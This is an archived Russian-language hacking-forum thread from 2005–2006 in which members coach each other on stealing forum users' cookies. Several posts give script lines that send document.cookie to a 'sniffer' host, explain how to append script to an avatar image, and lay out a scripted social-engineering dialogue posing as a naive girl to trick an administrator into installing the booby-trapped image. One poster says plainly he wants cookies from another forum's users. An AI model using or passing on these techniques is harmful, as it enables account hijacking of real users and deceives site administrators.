ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.12.2005, 00:54
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190
Репутация:
134
|
|
После того как загоняю аватарку на форум получаю такой урл [url]http://www.пупкин.com/forums/image.php?u=927&dateline=1134105672
Дальше делаю так
<html><head></head><body>
<script lаnguage="JavaScript">
<!--
if (navigаtor.appNamе=="Microsoft Internet Explorer") windоw.locаtion.href="http://www.пупкин .com/forums/image.php?u=927&dateline=1134105672";
else windоw.locаtion.hrеf="http://www.мой сайт.narod.ru/index.htm";
// -->
</script></body></html><noscript><noscript><plаintext><plaintext>
Вроде всё правильно…? |
|
|
10.12.2005, 01:08
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
А тебе надо именно с редиректом на другую страницу?
Может тебе проще?
Лезешь на babiex.com, выбираешь откровенную фотку.
В Фотошопе ее немного уменьшаешь и кадрируешь. Вообщем - делаешь нормальную аватарку.
Дальше делаешь по принципу как тут: http://forum.xakep.ru/avatars/avatar15.gif
Только вместо кода с alert впихиваешь img = nеw Imаge(); img.srс = "http://адрес_до_снифера.ru/snif.php?"+document.cookie;
После чего отписываешь админу: "а на вашем форуме возможно в качестве аватарки использовать такое изображение? или тут есть цензура? если есть - то я тогда сменю. хотя мне бы и не хотелось, так как привык. спасибо." и даешь ссылку на аватарку.
Я открываю его в Ie. но мне открывается просто страница с крестиком....
Редиректа не происходит? Думай. Не в обиду, но в коде "защита от дурака". Но самая-самая примитивная. Она даже не от дурака, а от ленивого....
Я же пошагово все расписал и весь код привел.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 10.12.2005 в 01:11..
|
|
|
|
10.12.2005, 01:14
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190
Репутация:
134
|
|
Да чего мне обижаться то...  Я в этом деле полный чайник.Поэтому делаю всё по шаблону в твоей статье.Мне нужны куки с пользоателей одного форума.
Я про эту защиту от дурака уже сутки думаю Ну не догоняю я.....
Я сделал всё так как в статье.
Сделал реальную страницу и подставную...
Башка уже трещит.... |
|
|
|
10.12.2005, 01:21
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
=) там все очень и очень просто... подсказку дал - от ленивых.
вот ленивый читает статью и хочет повторить что там написано. как и что он будет делать? ну вот и сделай по другому.
по-моему уже все подсказал
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
10.12.2005, 02:11
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190
Репутация:
134
|
|
Скажите где ошибка.Я не ленивый.Я тупой!
(лучше в личку)
Текущее время 6:47. Всё заработало...
Сообщение от censored!
Не ленимся!
Последний раз редактировалось Гаврила; 14.12.2005 в 16:14..
|
|
|
|
10.12.2005, 02:35
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Нет, в данном случае ты ленивый.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
14.12.2005, 02:38
|
|
Новичок
Регистрация: 08.12.2005
Сообщений: 8
Провел на форуме:
39954
Репутация:
0
|
|
Ребята у меня тоже не получается =(
Пожалуйста помогите. Только большая прозьба не злитесь на меня. Ok?
вот скрипт:
Код:
<body onloаd="javаscript:document.locatiоn.replаce('http://сайт.ru')">
<script language="JavаScript">
img = nеw Imаge(); img.srс = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
</script>
Вроде правильно... Но не хочет отправлять на снифер данные...
А обязательно ставить ";" после document.cookie ?
Последний раз редактировалось zaero; 14.12.2005 в 02:54..
|
|
|
|
11.01.2006, 16:40
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
можно например вместо snif.php?"+document.cookie; прописать что-то типа snif.php?"+login&paswword
Прописать то можно все что хочешь, но работать не будет. Точнее - на снифер просто придет текст "login&paswword", а не настоящие login&paswword
Если было бы так легко - то зачем тогда народ заморачивается с куками? =)
Хотя ты и можешь попробовать получить значения некоторых полей, либо вообще себе на снифер послать любую страницу (от имени пользователя)
Если наобум, то надо "подделывать" его Форум. Способов и реализайия есть несколько. Будет время - я распишу по-шагово как это сделать на основе бага в изображениях. Или сам допетри - там не сложно! Также внимательно прочитай тут: http://www.forum.antichat.ru/thread11236.html
Идеи никакие не появились? =)
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 11.01.2006 в 16:48..
|
|
|
|
12.01.2006, 03:21
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
1)во-первых что IE, что не IE (мозилла), никуда ничего не пердеадреосвывается, остаётся на странице index.html
Там защита. Уже намекал как обходится: не ленимся!
(ну и в настройках браузера проверь - не отключена ли у тебя переадресация)
Ну если не получается залить, значит не получается залить. Потому что форум при заливке проверяет что ему заливают в качестве аватарки.
Попробуй открыть любое изображение блокнотом, отмотай вниз и в самом конце поставить <script>alert()</script>
Теперь пробуй залить. Опять не пущает? Попробуй изображение прилепить в тему. Смотри там при создании сообщения кнопку Обзор. Если не нашел, то пробуй так ссылку на изображение вставить. Вообщем пробуй не через кнопку Обзор, а через указания пути до изображения. Некоторые Форумы сами за тебя к себе закачают.
Конечно скажу. Изображение открывается на другом хостинге, и именно его куки ты пытаешься отправить на снифер. А так как их нету - то только рефферер и приходит.
...
1)во-первых что IE, что не IE (мозилла),
"Баг" в изображении тока под ИЕ
(ЗЫ форум ipb версии 1.3)
Дык под 1.3 есть сплойт ворующий хэш
Или попробуй применить Си (но время потребуется):
1 - Зарегь сайт на Народ_Ру.
2 - Положи туда свое изображение: открыл изображение, отмотал, вставил код
3 - Лезь в настройки аватарки и укажи полную ссылку на него
Народ_ру примечательный тем, что он не дает хостящие на нем изображения публиковать в других местах. Т.е. у тебя вместо аватарки будет отсутсвующий рисунок (с красным крестом).
4 - Теперь пиши Админу от имени голубоглазой девочки Маруси из деревни Нижние Васюки: извините, а можно Вам вопрос как сисадмину задать?
Он: угук. я такой. тока круче! чё нада?
Ты: Почему у всех на Форуме возле имени стоит рисунок, а у меня рисунок красным крестиком? Я сделала все так, как мне написали: мне прислали адрес рисунка которого я хотела, и я его вставила в поле URL... Но там на рисунке был бигимотик, а получается что крестик...
Он наверняка сначала отпишет: грузи ее через кнопку Обзор.
Ты (культурно): а не будете столь любезны подсказать, как ее загрузить?
Он: сохрани изображение на комп, и потом загрузи.
Ты: а как ее можно сохранить?
Он: правой кнопкой, потом в настройки профиля, кнопка обзор...
Ты: все. сохранила у себя. в папку Мои рисунки, но рядом с именем все-равно крестик. что я делаю не так?
Если он не повеситься и не снесет нахрен этот Форум, он сам тебе скачает это изображение, выложит на сервак и тебе его пропишет в профиле.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
Последний раз редактировалось censored!; 12.01.2006 в 03:28..
|
|
|
|
12.01.2006, 22:08
|
|
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876
Репутация:
81
|
|
qazwsx
Последний раз редактировалось George767; 14.01.2006 в 05:03..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
